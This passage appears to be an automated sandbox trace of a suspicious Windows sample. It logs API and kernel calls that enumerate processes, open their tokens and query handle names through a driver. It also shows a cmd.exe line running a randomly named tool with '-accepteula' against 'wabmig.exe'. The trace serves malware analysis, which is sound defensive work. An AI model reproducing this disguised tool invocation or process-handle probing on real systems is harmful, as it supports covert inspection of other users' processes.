[0227.493] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.493] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.493] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.493] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0227.493] PsLookupProcessByProcessId (in: ProcessId=0x494, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.493] PsAcquireProcessExitSynchronization () returned 0x0 [0227.493] KeStackAttachProcess (in: PROCESS=0xfffffa8003191b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003191b30, ApcState=0xfffff880052b35d0) [0227.493] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800264bf20, HandleInformation=0x0) returned 0x0 [0227.493] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.493] PsReleaseProcessExitSynchronization () returned 0x2 [0227.493] ObfDereferenceObject (Object=0xfffffa8003191b30) returned 0xd [0227.493] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.493] ObfDereferenceObject (Object=0xfffffa800264bf20) returned 0x1 [0227.493] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.494] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a8) returned 0xc8 [0227.494] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0227.494] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa80031ffb30, HandleInformation=0x0) returned 0x0 [0227.494] ObOpenObjectByPointer (in: Object=0xfffffa80031ffb30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800004f0) returned 0x0 [0227.494] ObfDereferenceObject (Object=0xfffffa80031ffb30) returned 0x20 [0227.494] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800004f0, DesiredAccess=0x8, TokenHandle=0xfffffa8002195c80 | out: TokenHandle=0xfffffa8002195c80*=0xc4) returned 0x0 [0227.494] ZwClose (Handle=0xffffffff800004f0) returned 0x0 [0227.494] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.494] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0227.494] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0227.496] CloseHandle (hObject=0xc4) returned 1 [0227.496] CloseHandle (hObject=0xc8) returned 1 [0227.496] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.496] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0227.496] PsLookupProcessByProcessId (in: ProcessId=0x5a8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.496] PsAcquireProcessExitSynchronization () returned 0x0 [0227.496] KeStackAttachProcess (in: PROCESS=0xfffffa80031ffb30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80031ffb30, ApcState=0xfffff880052b35d0) [0227.496] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002687680, HandleInformation=0x0) returned 0x0 [0227.496] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.496] PsReleaseProcessExitSynchronization () returned 0x2 [0227.496] ObfDereferenceObject (Object=0xfffffa80031ffb30) returned 0x1e [0227.496] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.496] ObfDereferenceObject (Object=0xfffffa8002687680) returned 0x1 [0227.496] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.496] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.496] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.496] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x86, lpOverlapped=0x0) returned 1 [0227.496] PsLookupProcessByProcessId (in: ProcessId=0x5a8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.496] PsAcquireProcessExitSynchronization () returned 0x0 [0227.496] KeStackAttachProcess (in: PROCESS=0xfffffa80031ffb30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80031ffb30, ApcState=0xfffff880052b35d0) [0227.496] ObReferenceObjectByHandle (in: Handle=0x24, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800286ddd0, HandleInformation=0x0) returned 0x0 [0227.496] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.497] PsReleaseProcessExitSynchronization () returned 0x2 [0227.497] ObfDereferenceObject (Object=0xfffffa80031ffb30) returned 0x1e [0227.497] ObQueryNameString (in: Object=0xfffffa800286ddd0, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880052b3550) returned 0x0 [0227.497] ObfDereferenceObject (Object=0xfffffa800286ddd0) returned 0x1 [0227.497] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.497] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb34) returned 0x0 [0227.497] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.497] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.497] PsLookupProcessByProcessId (in: ProcessId=0xb34, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.497] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.497] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.497] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.497] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.497] PsLookupProcessByProcessId (in: ProcessId=0xb34, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.497] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.497] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.497] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.497] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.497] PsLookupProcessByProcessId (in: ProcessId=0xb34, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.498] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.498] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.498] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.498] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.498] PsLookupProcessByProcessId (in: ProcessId=0xb34, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.498] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.498] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7b0) returned 0x0 [0227.498] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.498] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.498] PsLookupProcessByProcessId (in: ProcessId=0x7b0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.498] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.498] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.498] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.498] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.498] PsLookupProcessByProcessId (in: ProcessId=0x7b0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.498] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.498] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.498] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.498] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.498] PsLookupProcessByProcessId (in: ProcessId=0x7b0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.498] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.498] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x67c) returned 0x0 [0227.498] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.498] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.498] PsLookupProcessByProcessId (in: ProcessId=0x67c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.498] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.498] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.499] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.499] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.499] PsLookupProcessByProcessId (in: ProcessId=0x67c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.499] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.499] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.499] GetLastError () returned 0x57 [0227.499] SetLastError (dwErrCode=0x57) [0227.499] GetLastError () returned 0x57 [0227.499] SetLastError (dwErrCode=0x57) [0227.499] GetLastError () returned 0x57 [0227.499] SetLastError (dwErrCode=0x57) [0227.499] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x1000) returned 0x364b20 [0227.499] GetLastError () returned 0x57 [0227.499] SetLastError (dwErrCode=0x57) [0227.499] GetLastError () returned 0x57 [0227.499] SetLastError (dwErrCode=0x57) [0227.499] GetLastError () returned 0x57 [0227.500] SetLastError (dwErrCode=0x57) [0227.500] GetLastError () returned 0x57 [0227.500] SetLastError (dwErrCode=0x57) [0227.500] GetLastError () returned 0x57 [0227.500] SetLastError (dwErrCode=0x57) [0227.500] GetLastError () returned 0x57 [0227.500] SetLastError (dwErrCode=0x57) [0227.500] GetLastError () returned 0x57 [0227.500] SetLastError (dwErrCode=0x57) [0227.500] GetLastError () returned 0x57 [0227.500] SetLastError (dwErrCode=0x57) [0227.500] GetLastError () returned 0x57 [0227.500] SetLastError (dwErrCode=0x57) [0227.500] GetLastError () returned 0x57 [0227.500] SetLastError (dwErrCode=0x57) [0227.500] GetLastError () returned 0x57 [0227.500] SetLastError (dwErrCode=0x57) [0227.500] GetLastError () returned 0x57 [0227.500] SetLastError (dwErrCode=0x57) [0227.500] GetLastError () returned 0x57 [0227.500] SetLastError (dwErrCode=0x57) [0227.500] GetLastError () returned 0x57 [0227.500] SetLastError (dwErrCode=0x57) [0227.500] GetLastError () returned 0x57 [0227.500] SetLastError (dwErrCode=0x57) [0227.500] GetLastError () returned 0x57 [0227.500] SetLastError (dwErrCode=0x57) [0227.500] GetLastError () returned 0x57 [0227.500] SetLastError (dwErrCode=0x57) [0227.500] GetLastError () returned 0x57 [0227.500] SetLastError (dwErrCode=0x57) [0227.501] GetLastError () returned 0x57 [0227.501] SetLastError (dwErrCode=0x57) [0227.501] GetLastError () returned 0x57 [0227.501] SetLastError (dwErrCode=0x57) [0227.501] GetLastError () returned 0x57 [0227.501] SetLastError (dwErrCode=0x57) [0227.501] GetLastError () returned 0x57 [0227.501] SetLastError (dwErrCode=0x57) [0227.501] GetLastError () returned 0x57 [0227.501] SetLastError (dwErrCode=0x57) [0227.501] GetLastError () returned 0x57 [0227.501] SetLastError (dwErrCode=0x57) [0227.501] GetLastError () returned 0x57 [0227.501] SetLastError (dwErrCode=0x57) [0227.501] GetLastError () returned 0x57 [0227.501] SetLastError (dwErrCode=0x57) [0227.501] GetLastError () returned 0x57 [0227.501] SetLastError (dwErrCode=0x57) [0227.501] GetVersion () returned 0x1db10106 [0227.501] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4 [0227.501] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x4, lpConsoleScreenBufferInfo=0x12fec0 | out: lpConsoleScreenBufferInfo=0x12fec0) returned 0 [0227.503] WriteFile (in: hFile=0x4, lpBuffer=0x12e900*, nNumberOfBytesToWrite=0x1d, lpNumberOfBytesWritten=0x12e220, lpOverlapped=0x0 | out: lpBuffer=0x12e900*, lpNumberOfBytesWritten=0x12e220*=0x1d, lpOverlapped=0x0) returned 1 [0227.504] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x340080 | out: hHeap=0x320000) returned 1 [0227.504] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x12feb8 | out: phModule=0x12feb8) returned 0 [0227.505] RtlExitUserProcess (ExitCode=0x1) [0227.506] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x33f050 | out: hHeap=0x320000) returned 1 [0228.637] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) Thread: id = 746 os_tid = 0xb84 Process: id = "192" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x2d3db000" os_pid = "0xa20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "156" os_parent_pid = "0x710" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"wabmig.exe\" -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 738 os_tid = 0xb68 [0195.110] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x3ffd54 | out: lpSystemTimeAsFileTime=0x3ffd54*(dwLowDateTime=0x2d5f79e0, dwHighDateTime=0x1d68287)) [0195.110] GetCurrentProcessId () returned 0xa20 [0195.110] GetCurrentThreadId () returned 0xb68 [0195.110] GetTickCount () returned 0x115d328 [0195.110] QueryPerformanceCounter (in: lpPerformanceCount=0x3ffd4c | out: lpPerformanceCount=0x3ffd4c*=31544942803) returned 1 [0195.113] GetModuleHandleA (lpModuleName=0x0) returned 0x49da0000 [0195.113] __set_app_type (_Type=0x1) [0195.113] __p__fmode () returned 0x770331f4 [0195.113] __p__commode () returned 0x770331fc [0195.113] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49dc21a6) returned 0x0 [0195.113] __getmainargs (in: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c, _DoWildCard=0, _StartInfo=0x49dc4140 | out: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c) returned 0 [0195.114] GetCurrentThreadId () returned 0xb68 [0195.114] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb68) returned 0x60 [0195.114] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0195.114] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0195.114] SetThreadUILanguage (LangId=0x0) returned 0x409 [0195.803] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0195.803] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x3ffce4 | out: phkResult=0x3ffce4*=0x0) returned 0x2 [0195.803] VirtualQuery (in: lpAddress=0x3ffd1b, lpBuffer=0x3ffcb4, dwLength=0x1c | out: lpBuffer=0x3ffcb4*(BaseAddress=0x3ff000, AllocationBase=0x300000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0195.803] VirtualQuery (in: lpAddress=0x300000, lpBuffer=0x3ffcb4, dwLength=0x1c | out: lpBuffer=0x3ffcb4*(BaseAddress=0x300000, AllocationBase=0x300000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0195.803] VirtualQuery (in: lpAddress=0x301000, lpBuffer=0x3ffcb4, dwLength=0x1c | out: lpBuffer=0x3ffcb4*(BaseAddress=0x301000, AllocationBase=0x300000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0195.803] VirtualQuery (in: lpAddress=0x303000, lpBuffer=0x3ffcb4, dwLength=0x1c | out: lpBuffer=0x3ffcb4*(BaseAddress=0x303000, AllocationBase=0x300000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0195.804] VirtualQuery (in: lpAddress=0x400000, lpBuffer=0x3ffcb4, dwLength=0x1c | out: lpBuffer=0x3ffcb4*(BaseAddress=0x400000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x150000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0195.804] GetConsoleOutputCP () returned 0x1b5 [0195.804] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0195.804] SetConsoleCtrlHandler (HandlerRoutine=0x49dbe72a, Add=1) returned 1 [0195.804] _get_osfhandle (_FileHandle=1) returned 0x80 [0195.804] SetConsoleMode (hConsoleHandle=0x80, dwMode=0x0) returned 0 [0195.804] _get_osfhandle (_FileHandle=1) returned 0x80 [0195.804] GetConsoleMode (in: hConsoleHandle=0x80, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 0 [0195.804] _get_osfhandle (_FileHandle=0) returned 0x3 [0195.804] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0195.805] GetEnvironmentStringsW () returned 0x7321d0* [0195.805] GetProcessHeap () returned 0x720000 [0195.805] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0xb7c) returned 0x732d58 [0195.805] FreeEnvironmentStringsW (penv=0x7321d0) returned 1 [0195.805] GetProcessHeap () returned 0x720000 [0195.805] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x4) returned 0x7318b0 [0195.805] GetEnvironmentStringsW () returned 0x7321d0* [0195.805] GetProcessHeap () returned 0x720000 [0195.805] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0xb7c) returned 0x7338e0 [0195.806] FreeEnvironmentStringsW (penv=0x7321d0) returned 1 [0195.806] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3fec54 | out: phkResult=0x3fec54*=0x68) returned 0x0 [0195.806] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3fec5c, lpData=0x3fec60, lpcbData=0x3fec58*=0x1000 | out: lpType=0x3fec5c*=0x0, lpData=0x3fec60*=0x0, lpcbData=0x3fec58*=0x1000) returned 0x2 [0195.806] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3fec5c, lpData=0x3fec60, lpcbData=0x3fec58*=0x1000 | out: lpType=0x3fec5c*=0x4, lpData=0x3fec60*=0x1, lpcbData=0x3fec58*=0x4) returned 0x0 [0195.806] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3fec5c, lpData=0x3fec60, lpcbData=0x3fec58*=0x1000 | out: lpType=0x3fec5c*=0x0, lpData=0x3fec60*=0x1, lpcbData=0x3fec58*=0x1000) returned 0x2 [0195.806] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3fec5c, lpData=0x3fec60, lpcbData=0x3fec58*=0x1000 | out: lpType=0x3fec5c*=0x4, lpData=0x3fec60*=0x0, lpcbData=0x3fec58*=0x4) returned 0x0 [0195.806] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3fec5c, lpData=0x3fec60, lpcbData=0x3fec58*=0x1000 | out: lpType=0x3fec5c*=0x4, lpData=0x3fec60*=0x40, lpcbData=0x3fec58*=0x4) returned 0x0 [0195.806] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3fec5c, lpData=0x3fec60, lpcbData=0x3fec58*=0x1000 | out: lpType=0x3fec5c*=0x4, lpData=0x3fec60*=0x40, lpcbData=0x3fec58*=0x4) returned 0x0 [0195.806] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3fec5c, lpData=0x3fec60, lpcbData=0x3fec58*=0x1000 | out: lpType=0x3fec5c*=0x0, lpData=0x3fec60*=0x40, lpcbData=0x3fec58*=0x1000) returned 0x2 [0195.806] RegCloseKey (hKey=0x68) returned 0x0 [0195.806] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3fec54 | out: phkResult=0x3fec54*=0x68) returned 0x0 [0195.806] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3fec5c, lpData=0x3fec60, lpcbData=0x3fec58*=0x1000 | out: lpType=0x3fec5c*=0x0, lpData=0x3fec60*=0x40, lpcbData=0x3fec58*=0x1000) returned 0x2 [0195.806] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3fec5c, lpData=0x3fec60, lpcbData=0x3fec58*=0x1000 | out: lpType=0x3fec5c*=0x4, lpData=0x3fec60*=0x1, lpcbData=0x3fec58*=0x4) returned 0x0 [0195.807] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3fec5c, lpData=0x3fec60, lpcbData=0x3fec58*=0x1000 | out: lpType=0x3fec5c*=0x0, lpData=0x3fec60*=0x1, lpcbData=0x3fec58*=0x1000) returned 0x2 [0195.807] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3fec5c, lpData=0x3fec60, lpcbData=0x3fec58*=0x1000 | out: lpType=0x3fec5c*=0x4, lpData=0x3fec60*=0x0, lpcbData=0x3fec58*=0x4) returned 0x0 [0195.807] RegQueryValueExW (in: hKey=0x68, 